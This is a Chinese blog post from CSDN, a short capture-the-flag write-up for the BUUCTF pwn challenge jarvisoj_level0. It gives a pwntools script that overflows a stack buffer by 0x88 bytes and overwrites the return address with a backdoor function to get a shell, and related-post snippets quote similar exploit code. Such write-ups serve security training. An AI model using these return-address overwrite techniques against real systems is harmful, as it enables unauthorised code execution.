BUUCTF jarvisoj_level0

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量459 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130374554
版权

小白垃圾做题笔记而已,不建议阅读。。。

这道题感觉主要就是64位程序ebp=8

题目中给出了shellcode

我们直接将返回地址覆盖就好。

在main函数中调用了vulnerable_function()函数。 

vulnerable函数是一个漏洞函数:(存在缓溢出),我们只需要将buf溢出到返回地址,返回地址覆盖为sys函数地址即可。

 

exp:这里用下大佬的模板。

from pwn import *

debug=1
if debug:
    p=process('./level0')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    pause()
#    gdb.attach(p)
else:
    p=remote('')

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)


sys_add=0x040059A


payload='a'*0x88+p64(sys_add)
ru(' World\n')
se(payload)

p.interactive()
 

ok

 

y6y6y666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 365
Buu CTF PWN题jarvisoj_level0的WriteUp
BUUCTF pwn——level0
CNS-Enterprise BCC-1701-J
03-12 150
BUUCTF 做题练习
buuoj jarvisoj_level0 writeup
m0_73605862的博客
05-30 97
Step4:查看vulnerable_function()函数,发现buf定义了80个字节,猜测是栈溢出漏洞,然后查找一下后门函数。Step5:shift+F12查看字符串,发现/bin/sh,点击进去查看,然后shift+x,查看地址为0x400596。Step6:编写exp,输入以后,ls查看文件,发现有一个flag.txt文件,cat 查看文件,得到flag。【来源】(buuoj)https://buuoj.cn/challenges#jarvisoj_level0。
buuctf jarvisoj_level0
carol2358的博客
04-17 638
栈溢出,然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
level_set_image.rar_level set_level set 方程
09-21
这个"level_set_image.rar_level set_level set 方程"的压缩包内容可能包含了一个名为"level_set_image.m"的MATLAB程序,用于演示或实现Level Set方法在图像处理中的应用。 Level Set方法的核心在于用一个标量函数...
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
标题中的“five_level_inverter.rar_CMLI_5level_harmonics inverter”表明了这是一个关于五电平电流源逆变器(Current Mode Logic Inverter,CMLI)的资料,重点在于其谐波特性。描述中的“harmonics of five level...
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
psm.rar_5 LEVEL_level inverter_psim
09-20
标题"psm.rar_5 LEVEL_level inverter_psim"指的是一个关于5级逆变器的仿真项目,其中"5_LEVEL"强调了其多电平特性,"level inverter"是5级逆变器的英文表述,而"psim"则表明这个项目是使用PSIM(Power System ...
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1081
buuctf pwn
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 333
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
jarvisoj_level
m0_75234353的博客
05-09 152
这题和前面最大的不同就是x64,就意味着参数调用方式的不同。不再是像32位一样,把参数压入栈中。而是先压入指定寄存器,第七个以后的再按逆序压入栈。
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 230
BUUCTF 做题练习
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 525
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 447
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 283
AI安全-文生图
安全密码算法:SM3哈希算法介绍
Angelic_lan的博客
08-16 854
国密算法之一,哈希算法的一种,也是密码杂凑算法。可以将不定长的输入消息message,经过SM3算法计算后输出为32B固定长度的哈希值(hash value)。哈希算法的实质是单向散列函数(one-way hash function),其特点是,输入数据有1bit的改变都有很大概率会产生不同的散列值,因而很多场景中会使用散列值来验证输入消息的完整性。
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值